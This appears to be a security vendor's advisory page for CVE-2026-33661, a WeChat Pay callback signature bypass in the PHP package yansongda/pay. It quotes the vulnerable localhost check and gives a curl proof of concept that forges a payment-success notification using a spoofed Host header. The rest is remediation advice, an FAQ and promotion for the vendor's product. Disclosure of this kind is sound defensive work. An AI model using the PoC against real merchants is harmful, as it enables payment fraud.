CVE-2026-33661

CVE-2026-33661 is a high-severity security vulnerability in yansongda/pay (composer), affecting versions <= 3.7.19. It is fixed in 3.7.20.

Summary

The verify_wechat_sign() function in src/Functions.php unconditionally skips all signature verification when the PSR-7 request reports localhost as the host. An attacker can exploit this by sending a crafted HTTP request to the WeChat Pay callback endpoint with a Host: localhost header, bypassing the RSA signature check entirely.

This allows forging fake WeChat Pay payment success notifications, potentially causing applications to mark orders as paid without actual payment.

Vulnerable Code

src/Functions.php lines 243-246:

function verify_wechat_sign(ResponseInterface|ServerRequestInterface $message, array $params): void
{
    // BYPASS: Returns without any signature check if Host header is localhost
    if ($message instanceof ServerRequestInterface && 'localhost' === $message->getUri()->getHost()) {
        return;  // No signature verified!
    }

    // ... openssl_verify() only reached when Host != localhost
    $wechatSerial = $message->getHeaderLine('Wechatpay-Serial');
    $sign = $message->getHeaderLine('Wechatpay-Signature');
    $result = 1 === openssl_verify($content, base64_decode($sign), $public, 'sha256WithRSAEncryption');
}

In PSR-7 implementations (Nyholm, Guzzle PSR-7, etc.), $request->getUri()->getHost() reads the Host HTTP header, which is fully attacker-controlled.

Proof of Concept

curl -X POST https://merchant.example.com/payment/wechat/callback \
  -H "Host: localhost" \
  -H "Content-Type: application/json" \
  -H "Wechatpay-Serial: any" \
  -H "Wechatpay-Timestamp: 1234567890" \
  -H "Wechatpay-Nonce: abc" \
  -H "Wechatpay-Signature: AAAA" \
  -d '{"id":"fake-order","event_type":"TRANSACTION.SUCCESS"}'

verify_wechat_sign() returns immediately without verifying the signature. The application marks the order as paid.

Impact

  • Payment fraud: Attacker receives goods/services without actual payment by forging WeChat Pay callbacks
  • No authentication required: Pure network attack, zero privileges needed
  • Wide reach: Affects any application using yansongda/pay for WeChat Pay callback validation. However, in most environments, Nginx/Ingress/Cloudflare/WAF will directly reject the forgery of this request header, so there is no need to worry too much.

CVE-2026-33661 has a CVSS score of 8.6 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.7.20); upgrading removes the vulnerable code path.

Affected versions

yansongda/pay (<= 3.7.19)

Security releases

yansongda/pay → 3.7.20 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade yansongda/pay to 3.7.20 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-33661? CVE-2026-33661 is a high-severity security vulnerability in yansongda/pay (composer), affecting versions <= 3.7.19. It is fixed in 3.7.20.
  2. How severe is CVE-2026-33661? CVE-2026-33661 has a CVSS score of 8.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of yansongda/pay are affected by CVE-2026-33661? yansongda/pay (composer) versions <= 3.7.19 is affected.
  4. Is there a fix for CVE-2026-33661? Yes. CVE-2026-33661 is fixed in 3.7.20. Upgrade to this version or later.
  5. Is CVE-2026-33661 exploitable, and should I be worried? Whether CVE-2026-33661 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33661 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33661? Upgrade yansongda/pay to 3.7.20 or later.

Other vulnerabilities in yansongda/pay

Stop the waste.
Protect your environment with Kodem.